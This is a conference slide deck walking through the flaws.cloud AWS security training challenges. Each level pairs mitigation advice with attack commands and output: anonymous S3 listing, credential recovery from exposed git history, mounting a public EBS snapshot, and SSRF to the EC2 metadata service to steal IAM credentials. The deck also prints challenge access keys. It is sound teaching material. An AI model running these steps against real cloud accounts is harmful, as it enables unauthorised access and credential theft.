Tweet
Tweet

Slide 1

Slide 1 text

Exploring flAWS in S3 & beyond

Slide 2

Slide 2 text

HEY THERE! I’m Mike Lehan Software engineer, CTO, northerner, skydiver Follow me @m1ke 2

Slide 3

Slide 3 text

flaws.cloud A training resource to learn about AWS misconfigurations - how to exploit & remedy Written by Scott Piper of Summit Route 3

Slide 4

Slide 4 text

1. WEB HOSTING & PUBLIC PERMISSIONS

Slide 5

Slide 5 text

“This level is *buckets* of fun. See if you can find the first sub-domain. 5 CURRENT URL http://flaws.cloud

Slide 6

Slide 6 text

S3 Simple Storage Service OBJECT A file along with its metadata and permissions BUCKET A geographically located object storage container 6

Slide 7

Slide 7 text

WEB HOSTING ▪ S3 makes it very easy to host static web sites ▪ Every bucket must have a globally unique name ▪ Each bucket is in an AWS region: us-east-1, eu-west-2… etc. ▪ For websites, bucket name must match web address ▪ All S3 websites accessible at: bucket-name.s3-website-region.amazonaws.com 7

Slide 8

Slide 8 text

TARGET RESEARCH 8 $ dig +noall +answer flaws.cloud flaws.cloud. 5 IN A 52.218.249.163 Now we know our target is an S3 bucket in us-west-2. Can we see what’s in the bucket? $ nslookup 52.218.249.163 [...] s3-website-us-west-2.amazonaws.com.

Slide 9

Slide 9 text

AWS CLI 9 $ aws s3 ls s3://flaws.cloud --no-sign-request \ --region us-west-2 ... 2018-07-10 17:47:16 3082 index.html 2017-02-27 01:59:30 1051 secret-dd02c7c.html Command line tool can run anonymously

Slide 10

Slide 10 text

MITIGATION ▪ When enabling website access S3 adds a policy giving any user the s3:GetObject permission 10 { "Version": "2008-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "s3:GetObject", "Resource": "arn:aws:s3:::your-bucket-name.com/*" } ] }

Slide 11

Slide 11 text

MITIGATION ▪ Users may inadvertently enable a public listing ACL 11

Slide 12

Slide 12 text

2. ACL & PROBLEMS WITH NAMING THINGS

Slide 13

Slide 13 text

“ The next level is fairly similar, with a slight twist. You're going to need your own AWS account for this. You just need the free tier. 13 CURRENT URL http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Slide 14

Slide 14 text

CREATING YOUR TEST ACCOUNT ▪ Having your own AWS account is essential for testing ▪ Never access AWS as “root” if you can help it ▪ For the rest of these exercises find the IAM console, create a user with the AdminAccess policy ▪ Generate an Access Key from the security tab (you’ll only see the secret key once) ▪ For real use consider custom policies 14

Slide 15

Slide 15 text

CLI PROFILES 15 $ aws configure --profile bsides19 Using your own account gives you more control Enter your user’s access key, secret key, default region (e.g. us-west-2) and output (e.g. json)

Slide 16

Slide 16 text

ALL SET UP - RUN IT! 16 $ aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ \ --profile bsides19 ... 2017-02-27 02:02:14 2786 index.html 2017-02-27 02:02:15 1051 secret-e4443fc.html

Slide 17

Slide 17 text

MITIGATION ▪ This is caused by a canned ACL 17

Slide 18

Slide 18 text

MITIGATION ▪ In older versions of the console this was easy to apply accidentally - that has been resolved ▪ When writing bucket policies or IAM policies relating to buckets, you can control which ACLs can be applied 18 { "Action": "s3:PutObject" "Resource":"arn:aws:s3:::your-bucket.com/*" "Condition": { "StringEquals": { "s3:x-amz-acl": [ "public-read" ] } } }

Slide 19

Slide 19 text

3. A WHOLE NEW WAY TO EXPOSE GIT

Slide 20

Slide 20 text

“ The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you'll find something that will let you list what other buckets are. 20 CURRENT URL http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Slide 21

Slide 21 text

LISTING BUCKET CONTENTS 21 $ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ \ --no-sign-request --region us-west-2 PRE .git/ We start with what we did in challenge 1

Slide 22

Slide 22 text

S3 SYNC COMMAND 22 $ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ \ /tmp/flaws --no-sign-request --region us-west-2 Let’s extract those files $ cd /tmp/flaws $ git log commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 Oops, accidentally added something I shouldn't have commit f52ec03b227ea6094b04e43f475fb0126edb5a61 first commit

Slide 23

Slide 23 text

EXPLORING GIT FOR KEYS 23 $ git checkout f52e $ ls access_keys.txt The last commit looks interesting, what was in the first one? $ cat access_keys.txt access_key AKIAJ366LIPB4IJKT7SA secret_access_key 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 $ aws configure --profile flaws-3 # with the keys above

Slide 24

Slide 24 text

A NEW ACCOUNT 24 $ aws s3 ls --profile flaws-3 ... 2017-02-26 18:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud What can we find with the new keys?

Slide 25

Slide 25 text

MITIGATION ▪ Other existing vulnerabilities were needed to expose this problem ▪ When syncing files make sure to ignore .git ▪ Don’t commit credentials in the first place ▪ If credentials are exposed (or you think they might be) don’t cover it up - revoke them immediately 25

Slide 26

Slide 26 text

4. BREAKING INTO SERVERS BY CLONING THEIR DISKS

Slide 27

Slide 27 text

“ For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d1750 7bce8b86f3b.flaws.cloud It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it. 27 CURRENT URL http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Slide 28

Slide 28 text

EC2 Elastic Compute Cloud - servers, basically EBS Elastic Block Store - hard disks for EC2 SNAPSHOT Full copy of a disk, stored in S3 but not accessible via S3 28

Slide 29

Slide 29 text

EC2 SNAPSHOTS 29 $ aws sts get-caller-identity --profile flaws-3 ... "Account": "975426262029" Snapshots are often made public to transfer them between accounts. You just need an account ID... $ aws ec2 describe-snapshots --owner-id 975426262029 \ --profile bsides19 --region us-west-2 ... "SnapshotId": "snap-0b49342abd1bdcb89", "Encrypted": false

Slide 30

Slide 30 text

EXPLOITING OPEN SNAPSHOTS ▪ In the AWS console or CLI create a volume using a known snapshot ID ▪ Create a new EC2 instance and use this volume as one of the storage options ▪ On creating an instance you provide an SSH key ▪ Sign in to the instance with this key ▪ Mount the volume internally (commands differ per OS) 30

Slide 31

Slide 31 text

EXAMINING THE DISK 31 $ ls /mnt/home/ubuntu/ … setupNginx.sh $ cat /mnt/home/ubuntu/setupNginx.sh ... htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M Visit 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

Slide 32

Slide 32 text

MITIGATION ▪ Don’t open snapshots to the public unless that’s your ultimate goal - and be very careful if it is! ▪ When sharing, share with one specific account via its account ID (could be time consuming for >1 account) ▪ Encrypt snapshots - this way an accidentally exposed snapshot is useless without the encryption key 32

Slide 33

Slide 33 text

5. EXPOSING CREDENTIALS VIA PROXY OH MY

Slide 34

Slide 34 text

“ This EC2 has a simple HTTP only proxy on it. Here’s an example of it's usage: http:/ /4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.fla ws.cloud/proxy/neverssl.com/ See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it. 34 CURRENT URL http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/ 243f422c/

Slide 35

Slide 35 text

EC2 METADATA ▪ Every EC2 instance can access a “meta data” server at “169.254.169.254” to allow applications access to an IAM role ▪ Why a web server? This provides the most widely compatible mechanism for any application to fetch data ▪ Meta data service also gives info about the machine, network, image used, etc. ▪ Open proxies could allow external access to this... 35

Slide 36

Slide 36 text

REMOTE ACCESS 36 $ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/\ 169.254.169.254/ 1.0 2007-01-19 ... 2018-09-24 latest These are API versions available on the meta-data service

Slide 37

Slide 37 text

WHAT’S AVAILABLE? 37 $ curl {long-url}/169.254.169.254/latest/meta-data/ local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hostname iam/ identity-credentials/ instance-action instance-id Instance-type local-hostname

Slide 38

Slide 38 text

SHOW ME THE CREDS 38 $ curl {long-url}/{ip}/latest/meta-data/iam/security-credentials/flaws/ "AccessKeyId" : "ASIA6GG7PSQGZ7GSQOXZ", "SecretAccessKey" : "NEyuqZXZXo0z1MB2sP4d455R1NDPFdrRyv9mvRPX", "Token" : "{really long string}", Set these credentials up as a profile (flaws-5) BUT they won’t work without adding another line to ~/.aws/credentials [flaws-5] … aws_session_token = {really long string above}

Slide 39

Slide 39 text

USE THE CREDENTIALS 39 $ aws s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud \ --profile flaws-5 PRE ddcc78ff/

Slide 40

Slide 40 text

MITIGATION ▪ Don’t run proxies! ▪ If you need to, use a whitelist of allowed proxy domains or restrict to trusted users (?!) ▪ Specifically block the meta-data IP in your proxy, or using a firewall in front of your application (WAF) ▪ Nuclear option: route tables can block all local applications from meta-data service 40

Slide 41

Slide 41 text

6. INSECURE SECURITY AUDIT

Slide 42

Slide 42 text

“ For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account. Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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 42 CURRENT URL http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ ddcc78ff/

Slide 43

Slide 43 text

THE CANNED POLICY ▪ AWS provide “canned policies” - custom policies that allow users a range of access ▪ Often overly permissioned to avoid tools not working as expected for users ▪ Where possible it’s best to write your own policies based on the least privilege principle 43

Slide 44

Slide 44 text

SecurityAudit ▪ A canned policy allowing examination of resources in an account ▪ Allows viewing of policy content meaning a user can figure out what rights they’ve been given ▪ Knowing what permissions you have avoids triggering monitoring on disallowed actions 44

Slide 45

Slide 45 text

DIY 45 Completing level 6 takes a lot of individual steps and is more interesting as a concept than following it through on a slideshow. Go try it for yourself with what you’ve learned!

Slide 46

Slide 46 text

IN SUMMARY ▪ Roll credentials regularly; roll immediately if you suspect they are compromised (check out aws-vault) ▪ Apply least privilege on all IAM entities (and prefer roles over giving policies to users or groups) ▪ S3 has new “block public access” features - use them, but understand the underlying permissions ▪ Pentesters: check buckets, find creds, examine policies! 46

Slide 47

Slide 47 text

THANK YOU! Feedback or questions? https:/ /sched.co/R0EJ Twitter: @m1ke Slack: #og-aws 47 Thanks to Scott Piper for flaws.cloud and to slidescarnival.com for the slide theme